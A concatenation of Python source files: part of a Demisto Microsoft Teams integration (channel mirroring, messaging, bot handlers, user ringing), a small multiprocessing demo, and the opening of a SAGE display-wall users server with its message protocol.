channel_id: str = ''
channels: list = response.get('value', [])
for channel in channels:
channel_display_name: str = channel.get('displayName', '')
if channel_display_name == channel_name:
channel_id = channel.get('id', '')
break
if not channel_id:
raise ValueError(f'Could not find channel: {channel_name}')
return channel_id
def get_team_members(service_url: str, team_id: str) -> list:
"""
Retrieves team members given a team
:param team_id: ID of team to get team members of
:param service_url: Bot service URL to query
:return: List of team members
"""
url: str = f'{service_url}/v3/conversations/{team_id}/members'
response: list = cast(List[Any], http_request('GET', url, api='bot'))
return response
def update_message(service_url: str, conversation_id: str, activity_id: str, text: str):
"""
Updates a message in Microsoft Teams channel
:param service_url: Bot service URL to query
:param conversation_id: Conversation ID of message to update
:param activity_id: Activity ID of message to update
:param text: Text to update in the message
:return: None
"""
body = [{
'type': 'TextBlock',
'text': text
}]
adaptive_card: dict = create_adaptive_card(body=body)
conversation = {
'type': 'message',
'attachments': [adaptive_card]
}
url: str = f'{service_url}/v3/conversations/{conversation_id}/activities/{activity_id}'
http_request('PUT', url, json_=conversation, api='bot')
def close_channel_request(team_aad_id: str, channel_id: str):
"""
Sends an HTTP request to close a Microsoft Teams channel
:param team_aad_id: AAD ID of team to close the channel in
:param channel_id: ID of channel to close
:return: None
"""
url: str = f'{GRAPH_BASE_URL}/v1.0/teams/{team_aad_id}/channels/{channel_id}'
http_request('DELETE', url)
def close_channel():
"""
Deletes a mirrored Microsoft Teams channel
"""
integration_context: dict = demisto.getIntegrationContext()
channel_name: str = demisto.args().get('channel', '')
investigation: dict = demisto.investigation()
investigation_id: str = investigation.get('id', '')
channel_id: str = str()
team_aad_id: str
mirrored_channels: list
if not channel_name:
# Closing channel as part of autoclose in mirroring process
teams: list = json.loads(integration_context.get('teams', '[]'))
for team in teams:
team_aad_id = team.get('team_aad_id', '')
mirrored_channels = team.get('mirrored_channels', [])
for channel_index, channel in enumerate(mirrored_channels):
if channel.get('investigation_id') == investigation_id:
channel_id = channel.get('channel_id', '')
close_channel_request(team_aad_id, channel_id)
mirrored_channels.pop(channel_index)
team['mirrored_channels'] = mirrored_channels
break
if not channel_id:
raise ValueError('Could not find Microsoft Teams channel to close.')
integration_context['teams'] = json.dumps(teams)
demisto.setIntegrationContext(integration_context)
else:
team_name: str = demisto.args().get('team') or demisto.params().get('team')
team_aad_id = get_team_aad_id(team_name)
channel_id = get_channel_id(channel_name, team_aad_id, investigation_id)
close_channel_request(team_aad_id, channel_id)
demisto.results('Channel was successfully closed.')
def create_personal_conversation(integration_context: dict, team_member_id: str) -> str:
"""
Create a personal conversation with a team member
:param integration_context: Cached object to retrieve relevant data for the conversation creation
:param team_member_id: ID of team member to create a conversation with
:return: ID of created conversation
"""
bot_id: str = demisto.params().get('bot_id', '')
bot_name: str = integration_context.get('bot_name', '')
tenant_id: str = integration_context.get('tenant_id', '')
conversation: dict = {
'bot': {
'id': f'28:{bot_id}',
'name': bot_name
},
'members': [{
'id': team_member_id
}],
'channelData': {
'tenant': {
'id': tenant_id
}
}
}
service_url: str = integration_context.get('service_url', '')
if not service_url:
raise ValueError('Did not find service URL. Try messaging the bot on Microsoft Teams')
url: str = f'{service_url}/v3/conversations'
response: dict = cast(Dict[Any, Any], http_request('POST', url, json_=conversation, api='bot'))
return response.get('id', '')
def send_message_request(service_url: str, channel_id: str, conversation: dict):
"""
Sends an HTTP request to send message to Microsoft Teams
:param channel_id: ID of channel to send message in
:param conversation: Conversation message object to send
:param service_url: Bot service URL to query
:return: None
"""
url: str = f'{service_url}/v3/conversations/{channel_id}/activities'
http_request('POST', url, json_=conversation, api='bot')
def process_mentioned_users_in_message(message: str) -> Tuple[list, str]:
"""
Processes the message to include all mentioned users in the right format. For example:
Input: 'good morning @Demisto'
Output (Formatted message): 'good morning <at>@Demisto</at>'
:param message: The message to be processed
:return: A list of the mentioned users, The processed message
"""
mentioned_users: list = [''.join(user) for user in re.findall(MENTION_REGEX, message)]
for user in mentioned_users:
message = message.replace(f'@{user};', f'<at>@{user}</at>')
return mentioned_users, message
def mentioned_users_to_entities(mentioned_users: list, integration_context: dict) -> list:
"""
Returns a list of entities built from the mentioned users
:param mentioned_users: A list of mentioned users in the message
:param integration_context: Cached object to retrieve relevant data from
:return: A list of entities
"""
return [{'type': 'mention', 'mentioned': {'id': get_team_member_id(user, integration_context), 'name': user},
'text': f'<at>@{user}</at>'} for user in mentioned_users]
def send_message():
message_type: str = demisto.args().get('messageType', '')
original_message: str = demisto.args().get('originalMessage', '')
message: str = demisto.args().get('message', '')
try:
adaptive_card: dict = json.loads(demisto.args().get('adaptive_card', '{}'))
except ValueError:
raise ValueError('Given adaptive card is not in valid JSON format.')
if message_type == MESSAGE_TYPES['mirror_entry'] and ENTRY_FOOTER in original_message:
# Got a message which was already mirrored - skipping it
return
channel_name: str = demisto.args().get('channel', '')
if not channel_name and message_type in {MESSAGE_TYPES['status_changed'], MESSAGE_TYPES['incident_opened']}:
# Got a notification from server
channel_name = demisto.params().get('incident_notifications_channel', 'General')
severity: int = int(demisto.args().get('severity'))
severity_threshold: int = translate_severity(demisto.params().get('min_incident_severity', 'Low'))
if severity < severity_threshold:
return
team_member: str = demisto.args().get('team_member', '')
if not (team_member or channel_name):
raise ValueError('No channel or team member to send message were provided.')
if team_member and channel_name:
raise ValueError('Provide either channel or team member to send message to, not both.')
if not (message or adaptive_card):
raise ValueError('No message or adaptive card to send were provided.')
if message and adaptive_card:
raise ValueError('Provide either message or adaptive to send, not both.')
integration_context: dict = demisto.getIntegrationContext()
channel_id: str = str()
personal_conversation_id: str = str()
if channel_name:
team_name: str = demisto.args().get('team', '') or demisto.params().get('team', '')
team_aad_id: str = get_team_aad_id(team_name)
investigation_id: str = str()
if message_type == MESSAGE_TYPES['mirror_entry']:
# Got an entry from the War Room to mirror to Teams
# Getting investigation ID in case channel name is custom and not the default
investigation: dict = demisto.investigation()
investigation_id = investigation.get('id', '')
channel_id = get_channel_id(channel_name, team_aad_id, investigation_id)
elif team_member:
team_member_id: str = get_team_member_id(team_member, integration_context)
personal_conversation_id = create_personal_conversation(integration_context, team_member_id)
recipient: str = channel_id or personal_conversation_id
conversation: dict
if message:
entitlement_match: Optional[Match[str]] = re.search(ENTITLEMENT_REGEX, message)
if entitlement_match:
# In TeamsAsk process
adaptive_card = process_ask_user(message)
conversation = {
'type': 'message',
'attachments': [adaptive_card]
}
else:
# Sending regular message
formatted_message: str = urlify_hyperlinks(message)
mentioned_users, formatted_message_with_mentions = process_mentioned_users_in_message(formatted_message)
entities = mentioned_users_to_entities(mentioned_users, integration_context)
demisto.info(f'msg: {formatted_message_with_mentions}, ent: {entities}')
conversation = {
'type': 'message',
'text': formatted_message_with_mentions,
'entities': entities
}
else: # Adaptive card
conversation = {
'type': 'message',
'attachments': [adaptive_card]
}
service_url: str = integration_context.get('service_url', '')
if not service_url:
raise ValueError('Did not find service URL. Try messaging the bot on Microsoft Teams')
send_message_request(service_url, recipient, conversation)
demisto.results('Message was sent successfully.')
def mirror_investigation():
"""
Updates the integration context with a new or existing mirror.
"""
investigation: dict = demisto.investigation()
if investigation.get('type') == PLAYGROUND_INVESTIGATION_TYPE:
raise ValueError('Can not perform this action in playground.')
integration_context: dict = demisto.getIntegrationContext()
mirror_type: str = demisto.args().get('mirror_type', 'all')
auto_close: str = demisto.args().get('autoclose', 'true')
mirror_direction: str = demisto.args().get('direction', 'both').lower()
team_name: str = demisto.args().get('team', '')
if not team_name:
team_name = demisto.params().get('team', '')
team_aad_id: str = get_team_aad_id(team_name)
mirrored_channels: list = list()
teams: list = json.loads(integration_context.get('teams', '[]'))
team: dict = dict()
for team in teams:
if team.get('team_aad_id', '') == team_aad_id:
if team.get('mirrored_channels'):
mirrored_channels = team['mirrored_channels']
break
if mirror_direction != 'both':
mirror_type = f'{mirror_type}:{mirror_direction}'
investigation_id: str = investigation.get('id', '')
investigation_mirrored_index: int = is_investigation_mirrored(investigation_id, mirrored_channels)
if investigation_mirrored_index > -1:
# Updating channel mirror configuration
mirrored_channels[investigation_mirrored_index]['mirror_type'] = mirror_type
mirrored_channels[investigation_mirrored_index]['mirror_direction'] = mirror_direction
mirrored_channels[investigation_mirrored_index]['auto_close'] = auto_close
mirrored_channels[investigation_mirrored_index]['mirrored'] = False
demisto.results('Investigation mirror was updated successfully.')
else:
channel_name: str = demisto.args().get('channel_name', '') or f'incident-{investigation_id}'
channel_description: str = f'Channel to mirror incident {investigation_id}'
channel_id: str = create_channel(team_aad_id, channel_name, channel_description)
service_url: str = integration_context.get('service_url', '')
server_links: dict = demisto.demistoUrls()
server_link: str = server_links.get('server', '')
warroom_link: str = f'{server_link}#/WarRoom/{investigation_id}'
conversation: dict = {
'type': 'message',
'text': f'This channel was created to mirror [incident {investigation_id}]({warroom_link}) '
f'between Teams and Demisto. In order for your Teams messages to be mirrored in Demisto, '
f'you need to mention the Demisto Bot in the message.'
}
send_message_request(service_url, channel_id, conversation)
mirrored_channels.append({
'channel_id': channel_id,
'investigation_id': investigation_id,
'mirror_type': mirror_type,
'mirror_direction': mirror_direction,
'auto_close': auto_close,
'mirrored': False,
'channel_name': channel_name
})
demisto.results(f'Investigation mirrored successfully in channel {channel_name}.')
team['mirrored_channels'] = mirrored_channels
integration_context['teams'] = json.dumps(teams)
demisto.setIntegrationContext(integration_context)
def channel_mirror_loop():
"""
Runs in a long running container - checking for newly mirrored investigations.
"""
while True:
found_channel_to_mirror: bool = False
try:
integration_context = demisto.getIntegrationContext()
teams: list = json.loads(integration_context.get('teams', '[]'))
for team in teams:
mirrored_channels = team.get('mirrored_channels', [])
channel: dict
for channel in mirrored_channels:
investigation_id = channel.get('investigation_id', '')
if not channel['mirrored']:
demisto.info(f'Mirroring incident: {investigation_id} in Microsoft Teams')
channel_to_update: dict = channel
if channel_to_update['mirror_direction'] and channel_to_update['mirror_type']:
demisto.mirrorInvestigation(
channel_to_update['investigation_id'],
channel_to_update['mirror_type'],
bool(strtobool(channel_to_update['auto_close']))
)
channel_to_update['mirrored'] = True
demisto.info(f'Mirrored incident: {investigation_id} to Microsoft Teams successfully')
else:
demisto.info(f'Could not mirror {investigation_id}')
team['mirrored_channels'] = mirrored_channels
integration_context['teams'] = json.dumps(teams)
demisto.setIntegrationContext(integration_context)
found_channel_to_mirror = True
break
if found_channel_to_mirror:
break
except Exception as e:
demisto.error(f'An error occurred in channel mirror loop: {str(e)}')
demisto.updateModuleHealth(f'An error occurred: {str(e)}')
finally:
time.sleep(5)
def member_added_handler(integration_context: dict, request_body: dict, channel_data: dict):
"""
Handles member added activity
:param integration_context: Cached object to retrieve relevant data from
:param request_body: Activity payload
:param channel_data: Microsoft Teams tenant, team and channel details
:return: None
"""
bot_id = demisto.params().get('bot_id')
team: dict = channel_data.get('team', {})
team_id: str = team.get('id', '')
team_aad_id: str = team.get('aadGroupId', '')
team_name: str = team.get('name', '')
tenant: dict = channel_data.get('tenant', {})
tenant_id: str = tenant.get('id', '')
recipient: dict = request_body.get('recipient', {})
recipient_name: str = recipient.get('name', '')
members_added: list = request_body.get('membersAdded', [])
teams: list = json.loads(integration_context.get('teams', '[]'))
service_url: str = integration_context.get('service_url', '')
if not service_url:
raise ValueError('Did not find service URL. Try messaging the bot on Microsoft Teams')
for member in members_added:
member_id = member.get('id', '')
if bot_id in member_id:
# The bot was added to a team, caching team ID and team members
demisto.info(f'The bot was added to team {team_name}')
integration_context['tenant_id'] = tenant_id
integration_context['bot_name'] = recipient_name
break
team_members: list = get_team_members(service_url, team_id)
found_team: bool = False
for team in teams:
if team.get('team_aad_id', '') == team_aad_id:
team['team_members'] = team_members
found_team = True
break
if not found_team:
# Didn't found an existing team, adding new team object
teams.append({
'team_aad_id': team_aad_id,
'team_id': team_id,
'team_name': team_name,
'team_members': team_members
})
integration_context['teams'] = json.dumps(teams)
demisto.setIntegrationContext(integration_context)
def direct_message_handler(integration_context: dict, request_body: dict, conversation: dict, message: str):
"""
Handles a direct message sent to the bot
:param integration_context: Cached object to retrieve relevant data from
:param request_body: Activity payload
:param conversation: Conversation object sent
:param message: The direct message sent
:return: None
"""
conversation_id: str = conversation.get('id', '')
from_property: dict = request_body.get('from', {})
user_id: str = from_property.get('id', '')
team_member: dict = get_team_member(integration_context, user_id)
username: str = team_member.get('username', '')
user_email: str = team_member.get('user_email', '')
formatted_message: str = str()
attachment: dict = dict()
return_card: bool = False
allow_external_incidents_creation: bool = demisto.params().get('allow_external_incidents_creation', False)
lowered_message = message.lower()
if lowered_message.find('incident') != -1 and (lowered_message.find('create') != -1
or lowered_message.find('open') != -1
or lowered_message.find('new') != -1):
if user_email:
demisto_user = demisto.findUser(email=user_email)
else:
demisto_user = demisto.findUser(username=username)
if not demisto_user and not allow_external_incidents_creation:
data = 'You are not allowed to create incidents.'
else:
data = process_incident_create_message(demisto_user, message)
formatted_message = urlify_hyperlinks(data)
else:
try:
data = demisto.directMessage(message, username, user_email, allow_external_incidents_creation)
return_card = True
if data.startswith('`'): # We got a list of incidents/tasks:
data_by_line: list = data.replace('```', '').strip().split('\n')
return_card = True
if data_by_line[0].startswith('Task'):
attachment = process_tasks_list(data_by_line)
else:
attachment = process_incidents_list(data_by_line)
else: # Mirror investigation command / unknown direct message
attachment = process_mirror_or_unknown_message(data)
except Exception as e:
data = str(e)
if return_card:
conversation = {
'type': 'message',
'attachments': [attachment]
}
else:
formatted_message = formatted_message or data
conversation = {
'type': 'message',
'text': formatted_message
}
service_url: str = integration_context.get('service_url', '')
if not service_url:
raise ValueError('Did not find service URL. Try messaging the bot on Microsoft Teams')
send_message_request(service_url, conversation_id, conversation)
def entitlement_handler(integration_context: dict, request_body: dict, value: dict, conversation_id: str):
"""
Handles activity the bot received as part of TeamsAsk flow, which includes entitlement
:param integration_context: Cached object to retrieve relevant data from
:param request_body: Activity payload
:param value: Object which includes
:param conversation_id: Message conversation ID
:return: None
"""
response: str = value.get('response', '')
entitlement_guid: str = value.get('entitlement', '')
investigation_id: str = value.get('investigation_id', '')
task_id: str = value.get('task_id', '')
from_property: dict = request_body.get('from', {})
team_members_id: str = from_property.get('id', '')
team_member: dict = get_team_member(integration_context, team_members_id)
demisto.handleEntitlementForUser(
incidentID=investigation_id,
guid=entitlement_guid,
taskID=task_id,
email=team_member.get('user_email', ''),
content=response
)
activity_id: str = request_body.get('replyToId', '')
service_url: str = integration_context.get('service_url', '')
if not service_url:
raise ValueError('Did not find service URL. Try messaging the bot on Microsoft Teams')
update_message(service_url, conversation_id, activity_id, 'Your response was submitted successfully.')
def message_handler(integration_context: dict, request_body: dict, channel_data: dict, message: str):
"""
Handles a message in which the bot was mentioned
:param integration_context: Cached object to retrieve relevant data from
:param request_body: Activity payload
:param channel_data: Microsoft Teams tenant, team and channel details
:param message: The message which was sent mentioning the bot
:return: None
"""
channel: dict = channel_data.get('channel', {})
channel_id: str = channel.get('id', '')
team_id: str = channel_data.get('team', {}).get('id', '')
from_property: dict = request_body.get('from', {})
team_member_id: str = from_property.get('id', '')
if integration_context.get('teams'):
teams: list = json.loads(integration_context['teams'])
for team in teams:
if team.get('team_id', '') == team_id:
mirrored_channels: list = team.get('mirrored_channels', [])
for mirrored_channel in mirrored_channels:
if mirrored_channel.get('channel_id') == channel_id:
if mirrored_channel.get('mirror_direction', '') != 'FromDemisto' \
and 'none' not in mirrored_channel.get('mirror_type', ''):
investigation_id: str = mirrored_channel.get('investigation_id', '')
username: str = from_property.get('name', '')
user_email: str = get_team_member(integration_context, team_member_id).get('user_mail', '')
demisto.addEntry(
id=investigation_id,
entry=message,
username=username,
email=user_email,
footer=f'\n**{ENTRY_FOOTER}**'
)
return
@APP.route('/', methods=['POST'])
def messages() -> Response:
"""
Main handler for messages sent to the bot
"""
headers: dict = cast(Dict[Any, Any], request.headers)
if validate_auth_header(headers) is False:
demisto.info(f'Authorization header failed: {str(headers)}')
else:
request_body: dict = request.json
integration_context: dict = demisto.getIntegrationContext()
service_url: str = request_body.get('serviceUrl', '')
if service_url:
service_url = service_url[:-1] if service_url.endswith('/') else service_url
integration_context['service_url'] = service_url
demisto.setIntegrationContext(integration_context)
channel_data: dict = request_body.get('channelData', {})
event_type: str = channel_data.get('eventType', '')
conversation: dict = request_body.get('conversation', {})
conversation_type: str = conversation.get('conversationType', '')
conversation_id: str = conversation.get('id', '')
message_text: str = request_body.get('text', '')
# Remove bot mention
bot_name = integration_context.get('bot_name', '')
formatted_message: str = message_text.replace(f'<at>{bot_name}</at>', '')
value: dict = request_body.get('value', {})
if event_type == 'teamMemberAdded':
demisto.info('New Microsoft Teams team member was added')
member_added_handler(integration_context, request_body, channel_data)
elif value:
# In TeamsAsk process
demisto.info('Got response from user in MicrosoftTeamsAsk process')
entitlement_handler(integration_context, request_body, value, conversation_id)
elif conversation_type == 'personal':
demisto.info('Got direct message to the bot')
direct_message_handler(integration_context, request_body, conversation, formatted_message)
else:
demisto.info('Got message mentioning the bot')
message_handler(integration_context, request_body, channel_data, formatted_message)
demisto.info('Finished processing Microsoft Teams activity successfully')
demisto.updateModuleHealth('')
return Response(status=200)
def ring_user_request(call_request_data):
return http_request(method='POST', url=f'{GRAPH_BASE_URL}/v1.0/communications/calls',
json_=call_request_data)
def ring_user():
"""Rings a user on Teams.
Notes:
This is a ring only! no media plays in case the generated call is answered.
Returns:
None.
"""
bot_id = demisto.params().get('bot_id')
integration_context: dict = demisto.getIntegrationContext()
tenant_id: str = integration_context.get('tenant_id', '')
if not tenant_id:
raise ValueError(
'Did not receive tenant ID from Microsoft Teams, verify the messaging endpoint is configured correctly.'
)
# get user to call name and id
username_to_call = demisto.args().get('username')
users: list = get_users()
user_id: str = str()
for user in users:
if username_to_call in {user.get('displayName', ''), user.get('mail'), user.get('userPrincipalName')}:
user_id = user.get('id', '')
break
if not user_id:
raise ValueError(f'User {username_to_call} was not found')
call_request_data = {
"@odata.type": "#microsoft.graph.call",
"callbackUri": 'https://callback.url',
"direction": "outgoing",
"source": {
"@odata.type": "#microsoft.graph.participantInfo",
"identity": {
"@odata.type": "#microsoft.graph.identitySet",
"application": {
"@odata.type": "#microsoft.graph.identity",
"id": bot_id
}
}
},
"targets": [
{
"@odata.type": "#microsoft.graph.invitationParticipantInfo",
"identity": {
"@odata.type": "#microsoft.graph.identitySet",
"user": {
"@odata.type": "#microsoft.graph.identity",
"displayName": username_to_call,
"id": user_id
}
}
}
],
"requestedModalities": [
"audio"
],
"mediaConfig": {
"@odata.type": "#microsoft.graph.serviceHostedMediaConfig",
},
"tenantId": tenant_id
}
response = ring_user_request(call_request_data)
return_outputs(f"Calling {username_to_call}", {}, response)
def long_running_loop():
"""
The infinite loop which runs the mirror loop and the bot app in two different threads
"""
certificate: str = demisto.params().get('certificate', '')
private_key: str = demisto.params().get('key', '')
certificate_path = str()
private_key_path = str()
try:
port_mapping: str = PARAMS.get('longRunningPort', '')
port: int
if port_mapping:
if ':' in port_mapping:
port = int(port_mapping.split(':')[1])
else:
port = int(port_mapping)
else:
raise ValueError('No port mapping was provided')
Thread(target=channel_mirror_loop, daemon=True).start()
demisto.info('Started channel mirror loop thread')
ssl_args = dict()
if certificate and private_key:
certificate_file = NamedTemporaryFile(delete=False)
certificate_path = certificate_file.name
certificate_file.write(bytes(certificate, 'utf-8'))
certificate_file.close()
ssl_args['certfile'] = certificate_path
private_key_file = NamedTemporaryFile(delete=False)
private_key_path = private_key_file.name
private_key_file.write(bytes(private_key, 'utf-8'))
private_key_file.close()
ssl_args['keyfile'] = private_key_path
demisto.info('Starting HTTPS Server')
else:
demisto.info('Starting HTTP Server')
server = WSGIServer(('', port), APP, **ssl_args)
server.serve_forever()
except Exception as e:
if certificate_path:
os.unlink(certificate_path)
if private_key_path:
os.unlink(private_key_path)
demisto.error(f'An error occurred in long running loop: {str(e)}')
raise ValueError(str(e))
def test_module():
"""
Tests token retrieval for Bot Framework API
"""
get_bot_access_token()
demisto.results('ok')
def main():
""" COMMANDS MANAGER / SWITCH PANEL """
commands: dict = {
'test-module': test_module,
'long-running-execution': long_running_loop,
'send-notification': send_message,
'mirror-investigation': mirror_investigation,
'close-channel': close_channel,
'microsoft-teams-integration-health': integration_health,
'create-channel': create_channel_command,
'add-user-to-channel': add_user_to_channel_command,
# 'microsoft-teams-create-team': create_team,
# 'microsoft-teams-send-file': send_file,
'microsoft-teams-ring-user': ring_user,
'microsoft-teams-create-channel': create_channel_command,
'microsoft-teams-add-user-to-channel': add_user_to_channel_command,
}
''' EXECUTION '''
try:
handle_proxy()
command: str = demisto.command()
LOG(f'Command being called is {command}')
if command in commands.keys():
commands[command]()
# Log exceptions
except Exception as e:
if command == 'long-running-execution':
LOG(str(e))
LOG.print_log()
demisto.updateModuleHealth(str(e))
else:
return_error(str(e))
if __name__ == 'builtins':
main()
|
multi1.py
|
"""
multiprocess basics: Process works like threading.Thread, but
runs function call in parallel in a process instead of a thread;
locks can be used to synchronize, e.g. prints on some platforms;
starts new interpreter on windows, forks a new process on unix;
"""
import os
from multiprocessing import Process, Lock
def whoami(label, lock):
msg = '%s: name:%s, pid:%s'
with lock:
print(msg % (label, __name__, os.getpid()))
if __name__ == '__main__':
lock = Lock()
whoami('function call', lock)
p = Process(target=whoami, args=('spawned child', lock))
p.start()
p.join()
for i in range(5):
Process(target=whoami, args=(('run process %s' % i), lock)).start()
with lock:
print('Main process exit.')
|
ConnectionManager.py
|
#!/usr/bin/env python
############################################################################
#
# SAGE UI Users Server - A server that handles users, fsManagers and chat for SAGE
#
# Copyright (C) 2005 Electronic Visualization Laboratory,
# University of Illinois at Chicago
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the distribution.
# * Neither the name of the University of Illinois at Chicago nor
# the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Direct questions, comments etc about SAGE UI to www.evl.uic.edu/cavern/forum
#
# Author: Ratko Jagodic
#
############################################################################
from threading import *
import string, socket, os, os.path, sys, time, SimpleXMLRPCServer, xmlrpclib
# some global constants
CHUNK_SIZE = 2048 # we use fixed size messages... in bytes
SOCKET_TIMEOUT = 1 # in seconds
MSGLEN = CHUNK_SIZE
SEPARATOR = '\0' # null character for separation
NEW_STYLE_VER = "2.82" # below this UIs don't support system IP/port for machines
USER_SERVER_PORT = 15558 # port for the server to listen for User connections
SAGE_SERVER_PORT = 15557 # port for the server to listen for SAGE connections
MAX_USER_CONNECTIONS = 100 # maximum number of simultaneous User connections
MAX_SAGE_CONNECTIONS = 50 # maximum number of simultaneous SAGE connections
PRINT_TO_SCREEN = False # for debugging
#(prints our messages onto the screen as well as the log file)
socket.setdefaulttimeout(SOCKET_TIMEOUT)
messageNames = {}
messageNames[ 2000 ] = "Register"
messageNames[ 2001 ] = "Incoming Chat Message"
messageNames[ 2002 ] = "Check Username"
messageNames[ 2003 ] = "Unregister from room"
messageNames[ 30000 ] = "Machine Status"
messageNames[ 30001 ] = "User Status"
messageNames[ 30002 ] = "Outgoing Chat Message"
messageNames[ 30003 ] = "Username OK"
messageNames[ 31000 ] = "Info Message"
# MESSAGES:
#
#
# Notes:
# --------------------
# All messages are sent in this format (as strings):
# code
# data
#
# For example:
# "2002"
# "Ratko"
#
#
# All machines are always keyed by machineId that the users should connect to to control SAGE
#
#
# <<< UI ---> SERVER >>>
# CODE FORMAT MESSAGE
# ----------------------------------------------------------------
# 2000 username register this user with the Users server
# info
# machine_id the machines the user is connected to
#
# 2001 from={username} send a chat message to one person or to all
# to={"all" | id} id = specific to users connected to a sepcific SAGE machine
# message
#
# 2002 username check username for duplicates
#
# 2003 username unregister this username from the machine specified
# machine_id
#
#
# <<< SERVER ---> UI >>>
# CODE FORMAT MESSAGE
# ----------------------------------------------------------------
#
# 30000 machine_name a status list of all the MACHINES registered with the server
# ip
# port
# machineId
# alive={"1" | "0"} if the machine is alive, send 1, otherwise send 0
# displayInfo in this format: "Xtiles Ytiles tileWidth tileHeight"
# systemIP systemPort older UIs don't support this so not sent to them
# "\x00" < --- a break between different blocks of data
# machine_name
# ip
# port
# machineId
# alive={"1" | "0"} if the machine is alive, send 1, otherwise send 0
# displayInfo in this format: "Xtiles Ytiles tileWidth tileHeight"
# systemIP systemPort older UIs don't support this so not sent to them
# "\x00"
# ....
#
#
# 30001 username receive a list of USERS that are connected and their info
# info
# machine_id the machines the user is connected to
# machine_id
# "\x00" < --- a break between different users' info
# username
# info
# machine_id
# "\x00"
# ....
#
# 30002 from={username} receive a chat message from one person,
# to={"all" | id} id = specific to users connected to a specific SAGE machine
# message
#
# 30003 "1" | "0" 1=username OK, 0=username already in use
#
# 31000 message an informative message... just any string
#
#
#
# <<< SAGE ---> SERVER >>>
# CODE FORMAT MESSAGE
# ----------------------------------------------------------------
#
# 100 machine_name version "i am alive" message from SAGE
# pubIP pubPort < --- machine ip and port that SAGE UIs should connect to
# sysIP sysPort < --- machine ip and port that the apps should use for streaming
# displayInfo
# log the actions in a file
os.chdir(sys.path[0]) #change to the folder where the script is running
logFile = open("log.txt", "a")
logFileLock = RLock() #since multiple threads are writing to the same file
def WriteToFile(text):
logFileLock.acquire()
logFile.write( text )
if PRINT_TO_SCREEN:
print text
logFile.flush() #flush the buffer to a file (especially needed if running as a daemon)
logFileLock.release()
# record some stats to a file
statsFile = open("stats.txt", "a")
statsFileLock = RLock()
def WriteStats(text):
statsFileLock.acquire()
statsFile.write( text )
if PRINT_TO_SCREEN:
print text
statsFile.flush() #flush the buffer to a file (especially needed if running as a daemon)
statsFileLock.release()
############################################################################
#
# CLASS: SingleMachine
#
# DESCRIPTION: This is basically a thread that deals with the connection
# to ONLY ONE SAGE. It's created by the Server class upon
# connection from sage and it receives a clientsocket that
# was internally created by the Server. It then uses this
# socket for all the communication. One of these exists for
# every sage that is connected to this Server and the Server class
# keeps these SingleMachine objects in a list.
#
# DATE: May, 2005
#
############################################################################
class SingleMachine(Thread):
def __init__(self, socket, address, server):
Thread.__init__(self)
self.socket = socket
self.socket.settimeout(SOCKET_TIMEOUT)
self.server = server
self.threadKilled = False
self.name = ""
self.ip = address[0] # these 2 are use for control communication
self.port = ""
self.systemIP = "" # these 2 are used for streaming the data
self.systemPort = ""
self.sageVersion = None #version of SAGE
self.oldStyleSAGE = False
self.machineId = self.ip+":"+str(self.port)
self.displayInfo = ""
self.receivedRegisterMessage = False # in case SAGE connects but never registers the thread will be running forever
self.lastReportTime = None #this will be the time of the last report from fsManager
self.maxReportInterval = 6.0 #allow up to 6 seconds between the sage reports and then consider the fsManager disconnected
t = Timer(10, self.WaitForRegisterMessage)
t.start()
def WaitForRegisterMessage(self):
if not self.receivedRegisterMessage:
self.Stop(False)
# stops the thread, breaks the connection and unregisters the machine from this server
def Stop(self, unregister=True):
# record the stats
stats = "\nSAGE disconnected: "+self.name+" "+str(self.machineId)+" "+str(self.displayInfo)+" "+str(time.asctime())
WriteStats(stats)
WriteToFile( "\n*** Connection closed with SAGE: \"" + self.name + "\" <" + time.asctime() + ">")
self.threadKilled = True
if unregister:
self.server.UnregisterMachine(self.GetId())
self.socket.close()
#-----------------------------------------------
# data access methods
#-----------------------------------------------
def GetIP(self):
return self.ip
def GetName(self):
return self.name
def GetSystemIP(self):
return self.systemIP
def GetSystemPort(self):
return self.systemPort
def GetPort(self):
return self.port
def IsAlive(self):
return not self.threadKilled
def GetDisplayInfo(self):
return self.displayInfo
def GetId(self):
return self.machineId
#-------------------------------------------------------
# RECEIVING
#-------------------------------------------------------
# runs in a thread... started in the Server class
def run(self):
while not self.threadKilled:
try:
# this first receive will receive the length of the data
cleanMsg = self.GetMessage()
if not cleanMsg:
break #connection was closed
msgHeader = string.split( cleanMsg, "\n", 1 )
if len( msgHeader ) > 0:
code = int(msgHeader[0])
data = msgHeader[1]
else:
WriteToFile( "\n ERROR: message could not be split correctly into (code, data)")
break
# call the appropriate function to handle the incoming data
if code == 100:
self.OnRegisterMachineMessage(data)
except socket.timeout:
# if the fsManager hasn't reported in a while, assume it's dead and quit
if self.lastReportTime:
if time.time() - self.lastReportTime > self.maxReportInterval:
WriteToFile( "\nERROR: Time expired with SAGE connection " + self.name)
self.Stop()
continue
except socket.error:
WriteToFile( "\nERROR: UsersServer: socket error in connection with SAGE: " + self.name)
self.Stop()
break
# outside of while loop
self.threadKilled = True
WriteToFile("\nThread from "+self.name +" died")
def GetMessage(self, MSG_SIZE=CHUNK_SIZE):
# this first receive will receive the length of the data
msg = self.socket.recv(MSG_SIZE)
if len( msg ) < 2:
WriteToFile("\nERROR: message length < 2. Closing the connection with SAGE "+self.name)
